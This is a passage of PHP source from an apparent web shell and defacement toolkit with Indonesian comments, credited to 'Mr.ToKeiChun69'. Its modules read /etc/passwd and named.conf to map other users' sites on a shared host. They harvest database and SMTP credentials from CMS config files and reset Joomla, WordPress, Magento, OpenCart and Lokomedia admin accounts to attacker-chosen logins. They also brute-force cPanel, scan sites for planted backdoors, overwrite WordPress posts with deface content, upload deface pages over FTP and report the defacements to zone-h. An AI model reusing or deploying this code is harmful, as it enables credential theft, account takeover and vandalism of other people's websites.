  1924.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1925.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1926.  continue;
  1927.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1928.  <td align=center><font class=txt>" . $matches . "</td>";
  1929.  echo "<td align=center><font class=txt><a href=$full/scripts/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1930.  $dcount++;}
  1931.  fclose($file);
  1932.  echo "</table></div></center>";unlink("test.txt");
  1933.  } else
  1934.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1935.  }
  1936.  }    
  1937. }
  1938.  
  1939. elseif($_GET['do'] == 'jumping') {
  1940.     $i = 0;
  1941.     echo "<pre><div class='margin: 5px auto;'>";
  1942.     $etc = fopen("/etc/passwd", "r");
  1943.     while($passwd = fgets($etc)) {
  1944.         if($passwd == '' || !$etc) {
  1945.             echo "<font color=red>Can't read /etc/passwd</font>";
  1946.         } else {
  1947.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1948.             foreach($user_jumping[1] as $user_idx_jump) {
  1949.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1950.                 if(is_readable($user_jumping_dir)) {
  1951.                     $i++;
  1952.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1953.                     if(is_writable($user_jumping_dir)) {
  1954.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1955.                     }
  1956.                     echo $jrw;
  1957.                     $domain_jump = file_get_contents("/etc/named.conf");   
  1958.                     if($domain_jump == '') {
  1959.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1960.                     } else {
  1961.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1962.                         foreach($domains_jump[1] as $dj) {
  1963.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1964.                             $user_jumping_url = $user_jumping_url['name'];
  1965.                             if($user_jumping_url == $user_idx_jump) {
  1966.                                 echo " => ( <u>$dj</u> )<br>";
  1967.                                 break;
  1968.                             }
  1969.                         }
  1970.                     }
  1971.                 }
  1972.             }
  1973.         }
  1974.     }
  1975.     if($i == 0) {
  1976.     } else {
  1977.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1978.     }
  1979.     echo "</div></pre>";
  1980.  
  1981. } elseif($_GET['do'] == 'auto_edit_user') {
  1982.     if($_POST['hajar']) {
  1983.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1984.             echo "username atau password harus lebih dari 6 karakter";
  1985.         } else {
  1986.             $user_baru = $_POST['user_baru'];
  1987.             $pass_baru = md5($_POST['pass_baru']);
  1988.             $conf = $_POST['config_dir'];
  1989.             $scan_conf = scandir($conf);
  1990.             foreach($scan_conf as $file_conf) {
  1991.                 if(!is_file("$conf/$file_conf")) continue;
  1992.                 $config = file_get_contents("$conf/$file_conf");
  1993.                 if(preg_match("/JConfig|joomla/",$config)) {
  1994.                     $dbhost = ambilkata($config,"host = '","'");
  1995.                     $dbuser = ambilkata($config,"user = '","'");
  1996.                     $dbpass = ambilkata($config,"password = '","'");
  1997.                     $dbname = ambilkata($config,"db = '","'");
  1998.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1999.                     $prefix = $dbprefix."users";
  2000.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2001.                     $db = mysql_select_db($dbname);
  2002.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2003.                     $result = mysql_fetch_array($q);
  2004.                     $id = $result['id'];
  2005.                     $site = ambilkata($config,"sitename = '","'");
  2006.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2007.                     echo "Config => ".$file_conf."<br>";
  2008.                     echo "CMS => Joomla<br>";
  2009.                     if($site == '') {
  2010.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2011.                     } else {
  2012.                         echo "Sitename => $site<br>";
  2013.                     }
  2014.                     if(!$update OR !$conn OR !$db) {
  2015.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2016.                     } else {
  2017.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2018.                     }
  2019.                     mysql_close($conn);
  2020.                 } elseif(preg_match("/WordPress/",$config)) {
  2021.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2022.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2023.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2024.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2025.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2026.                     $prefix = $dbprefix."users";
  2027.                     $option = $dbprefix."options";
  2028.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2029.                     $db = mysql_select_db($dbname);
  2030.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2031.                     $result = mysql_fetch_array($q);
  2032.                     $id = $result[ID];
  2033.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2034.                     $result2 = mysql_fetch_array($q2);
  2035.                     $target = $result2[option_value];
  2036.                     if($target == '') {
  2037.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2038.                     } else {
  2039.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2040.                     }
  2041.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2042.                     echo "Config => ".$file_conf."<br>";
  2043.                     echo "CMS => Wordpress<br>";
  2044.                     echo $url_target;
  2045.                     if(!$update OR !$conn OR !$db) {
  2046.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2047.                     } else {
  2048.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2049.                     }
  2050.                     mysql_close($conn);
  2051.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2052.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2053.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2054.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2055.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2056.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2057.                     $prefix = $dbprefix."admin_user";
  2058.                     $option = $dbprefix."core_config_data";
  2059.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2060.                     $db = mysql_select_db($dbname);
  2061.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2062.                     $result = mysql_fetch_array($q);
  2063.                     $id = $result[user_id];
  2064.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2065.                     $result2 = mysql_fetch_array($q2);
  2066.                     $target = $result2[value];
  2067.                     if($target == '') {
  2068.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2069.                     } else {
  2070.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2071.                     }
  2072.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2073.                     echo "Config => ".$file_conf."<br>";
  2074.                     echo "CMS => Magento<br>";
  2075.                     echo $url_target;
  2076.                     if(!$update OR !$conn OR !$db) {
  2077.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2078.                     } else {
  2079.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2080.                     }
  2081.                     mysql_close($conn);
  2082.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2083.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2084.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2085.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2086.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2087.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2088.                     $prefix = $dbprefix."user";
  2089.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2090.                     $db = mysql_select_db($dbname);
  2091.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2092.                     $result = mysql_fetch_array($q);
  2093.                     $id = $result[user_id];
  2094.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2095.                     if($target == '') {
  2096.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2097.                     } else {
  2098.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2099.                     }
  2100.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2101.                     echo "Config => ".$file_conf."<br>";
  2102.                     echo "CMS => OpenCart<br>";
  2103.                     echo $url_target;
  2104.                     if(!$update OR !$conn OR !$db) {
  2105.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2106.                     } else {
  2107.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2108.                     }
  2109.                     mysql_close($conn);
  2110.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2111.                     $dbhost = ambilkata($config,'server = "','"');
  2112.                     $dbuser = ambilkata($config,'username = "','"');
  2113.                     $dbpass = ambilkata($config,'password = "','"');
  2114.                     $dbname = ambilkata($config,'database = "','"');
  2115.                     $prefix = "users";
  2116.                     $option = "identitas";
  2117.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2118.                     $db = mysql_select_db($dbname);
  2119.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2120.                     $result = mysql_fetch_array($q);
  2121.                     $target = $result[alamat_website];
  2122.                     if($target == '') {
  2123.                         $target2 = $result[url];
  2124.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2125.                         if($target2 == '') {
  2126.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2127.                         } else {
  2128.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2129.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2130.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2131.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2132.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2133.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2134.                             } else {
  2135.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2136.                             }
  2137.                         }
  2138.                     } else {
  2139.                         $cek_login = file_get_contents("$target/adminweb/");
  2140.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2141.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2142.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2143.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2144.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2145.                         } else {
  2146.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2147.                         }
  2148.                     }
  2149.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2150.                     echo "Config => ".$file_conf."<br>";
  2151.                     echo "CMS => Lokomedia<br>";
  2152.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2153.                         echo $url_target2;
  2154.                     } else {
  2155.                         echo $url_target;
  2156.                     }
  2157.                     if(!$update OR !$conn OR !$db) {
  2158.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2159.                     } else {
  2160.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2161.                     }
  2162.                     mysql_close($conn);
  2163.                 }
  2164.             }
  2165.         }
  2166.     } else {
  2167.         echo "<center>
  2168.         <h1>Auto Edit User Config</h1>
  2169.         <form method='post'>
  2170.         DIR Config: <br>
  2171.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2172.         Set User & Pass: <br>
  2173.         <input type='text' name='user_baru' value='root@1337' placeholder='user_baru'><br>
  2174.         <input type='text' name='pass_baru' value='root@1337' placeholder='pass_baru'><br>
  2175.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2176.         </form>
  2177.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2178.         ";
  2179.     }
  2180. }elseif($_GET['do'] == 'shelscan') {
  2181.     echo'<center><h2>Shell Finder</h2>
  2182. <form action="" method="post">
  2183. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  2184. <br>
  2185. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
  2186. </form><br>';
  2187. if (isset($_POST["scan"])) {  
  2188. $url = $_POST['traget'];
  2189. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  2190. echo "Result :<br />";
  2191. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  2192. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  2193. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  2194. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  2195. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  2196. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  2197. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  2198. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  2199. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  2200. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  2201. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  2202. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  2203. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  2204. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  2205. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  2206. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  2207. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  2208. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  2209. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  2210. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  2211. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  2212. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  2213. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  2214. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  2215. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  2216. foreach ($shells as $shell){
  2217. $headers = get_headers("$url$shell"); //
  2218. if (eregi('200', $headers[0])) {
  2219. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  2220. $dz = fopen('shells.txt', 'a+');
  2221. $suck = "$url$shell";
  2222. fwrite($dz, $suck."\n");
  2223. }
  2224. }
  2225. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  2226. }
  2227.    
  2228. }
  2229.  elseif($_GET['do'] == 'cpanel') {
  2230.     if($_POST['crack']) {
  2231.         $usercp = explode("\r\n", $_POST['user_cp']);
  2232.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2233.         $i = 0;
  2234.         foreach($usercp as $ucp) {
  2235.             foreach($passcp as $pcp) {
  2236.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2237.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2238.                     } else {
  2239.                         $_SESSION[$ucp] = "1";
  2240.                         $_SESSION[$pcp] = "1";
  2241.                         $i++;
  2242.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2243.                     }
  2244.                 }
  2245.             }
  2246.         }
  2247.         if($i == 0) {
  2248.         } else {
  2249.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69</font>";
  2250.         }
  2251.     } else {
  2252.         echo "<center>
  2253.         <form method='post'>
  2254.         USER: <br>
  2255.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2256.         $_usercp = fopen("/etc/passwd","r");
  2257.         while($getu = fgets($_usercp)) {
  2258.             if($getu == '' || !$_usercp) {
  2259.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2260.             } else {
  2261.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2262.                 foreach($u[1] as $user_cp) {
  2263.                         if(is_dir("/home/$user_cp/public_html")) {
  2264.                             echo "$user_cp\n";
  2265.                     }
  2266.                 }
  2267.             }
  2268.         }
  2269.         echo "</textarea><br>
  2270.         PASS: <br>
  2271.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2272.         function cp_pass($dir) {
  2273.             $pass = "";
  2274.             $dira = scandir($dir);
  2275.             foreach($dira as $dirb) {
  2276.                 if(!is_file("$dir/$dirb")) continue;
  2277.                 $ambil = file_get_contents("$dir/$dirb");
  2278.                 if(preg_match("/WordPress/", $ambil)) {
  2279.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2280.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2281.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2282.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2283.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2284.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2285.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2286.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2287.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2288.                 } elseif(preg_match("/client/", $ambil)) {
  2289.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2290.                     if(preg_match('/"/', $pass1[1])) {
  2291.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2292.                         $pass .= $pass1[1]."\n";
  2293.                     }
  2294.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2295.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2296.                 }
  2297.             }
  2298.             echo $pass;
  2299.         }
  2300.         $cp_pass = cp_pass($dir);
  2301.         echo $cp_pass;
  2302.         echo "</textarea><br>
  2303.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2304.         </form>
  2305.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2306.     }
  2307. } elseif($_GET['do'] == 'smtp') {
  2308.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2309.     function scj($dir) {
  2310.         $dira = scandir($dir);
  2311.         foreach($dira as $dirb) {
  2312.             if(!is_file("$dir/$dirb")) continue;
  2313.             $ambil = file_get_contents("$dir/$dirb");
  2314.             $ambil = str_replace("$", "", $ambil);
  2315.             if(preg_match("/JConfig|joomla/", $ambil)) {
  2316.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2317.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2318.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2319.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2320.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2321.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2322.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2323.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2324.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2325.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2326.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2327.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2328.             }
  2329.         }
  2330.     }
  2331.     $smpt_hunter = scj($dir);
  2332.     echo $smpt_hunter;
  2333. } elseif($_GET['do'] == 'auto_wp') {
  2334.     if($_POST['hajar']) {
  2335.         $title = htmlspecialchars($_POST['new_title']);
  2336.         $pn_title = str_replace(" ", "-", $title);
  2337.         if($_POST['cek_edit'] == "Y") {
  2338.             $script = $_POST['edit_content'];
  2339.         } else {
  2340.             $script = $title;
  2341.         }
  2342.         $conf = $_POST['config_dir'];
  2343.         $scan_conf = scandir($conf);
  2344.         foreach($scan_conf as $file_conf) {
  2345.             if(!is_file("$conf/$file_conf")) continue;
  2346.             $config = file_get_contents("$conf/$file_conf");
  2347.             if(preg_match("/WordPress/", $config)) {
  2348.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2349.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2350.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2351.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2352.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2353.                 $prefix = $dbprefix."posts";
  2354.                 $option = $dbprefix."options";
  2355.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2356.                 $db = mysql_select_db($dbname);
  2357.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2358.                 $result = mysql_fetch_array($q);
  2359.                 $id = $result[ID];
  2360.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2361.                 $result2 = mysql_fetch_array($q2);
  2362.                 $target = $result2[option_value];
  2363.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2364.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2365.                 echo "<div style='margin: 5px auto;'>";
  2366.                 if($target == '') {
  2367.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2368.                 } else {
  2369.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2370.                 }
  2371.                 if(!$update OR !$conn OR !$db) {
  2372.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2373.                 } else {
  2374.                     echo "<font color=lime>sukses di ganti.</font><br>";
  2375.                 }
  2376.                 echo "</div>";
  2377.                 mysql_close($conn);
  2378.             }
  2379.         }
  2380.     } else {
  2381.         echo "<center>
  2382.         <h1>Auto Edit Title+Content WordPress</h1>
  2383.         <form method='post'>
  2384.         DIR Config: <br>
  2385.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2386.         Set Title: <br>
  2387.         <input type='text' name='new_title' value='Hacked By Mr.ToKeiChun69' placeholder='New Title'><br><br>
  2388.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2389.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2390.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2391.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2392.         </form>
  2393.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2394.         ";
  2395.     }
  2396. } elseif($_GET['do'] == 'zoneh') {
  2397.     if($_POST['submit']) {
  2398.         $domain = explode("\r\n", $_POST['url']);
  2399.         $nick =  $_POST['nick'];
  2400.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2401.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2402.         function zoneh($url,$nick) {
  2403.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2404.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2405.                   curl_setopt($ch, CURLOPT_POST, true);
  2406.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2407.             return curl_exec($ch);
  2408.                   curl_close($ch);
  2409.         }
  2410.         foreach($domain as $url) {
  2411.             $zoneh = zoneh($url,$nick);
  2412.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2413.                 echo "$url -> <font color=lime>OK</font><br>";
  2414.             } else {
  2415.                 echo "$url -> <font color=red>ERROR</font><br>";
  2416.             }
  2417.         }
  2418.     } else {
  2419.         echo "<center><form method='post'>
  2420.         <u>Defacer</u>: <br>
  2421.         <input type='text' name='nick' size='50' value='Mr.ToKeiChun69'><br>
  2422.         <u>Domains</u>: <br>
  2423.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2424.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2425.         </form>";
  2426.     }
  2427.     echo "</center>";
  2428. }elseif($_GET['do'] == 'cpftp_auto') {
  2429.     if($_POST['crack']) {
  2430.         $usercp = explode("\r\n", $_POST['user_cp']);
  2431.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2432.         $i = 0;
  2433.         foreach($usercp as $ucp) {
  2434.             foreach($passcp as $pcp) {
  2435.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2436.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2437.                     } else {
  2438.                         $_SESSION[$ucp] = "1";
  2439.                         $_SESSION[$pcp] = "1";
  2440.                         if($ucp == '' || $pcp == '') {
  2441.                             //
  2442.                         } else {
  2443.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2444.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  2445.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  2446.                             if((!$ftp_login) || (!$ftp_conn)) {
  2447.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  2448.                             } else {
  2449.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  2450.                                 $fi = htmlspecialchars($_POST['file_deface']);
  2451.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2452.                                 if($deface) {
  2453.                                     $i++;
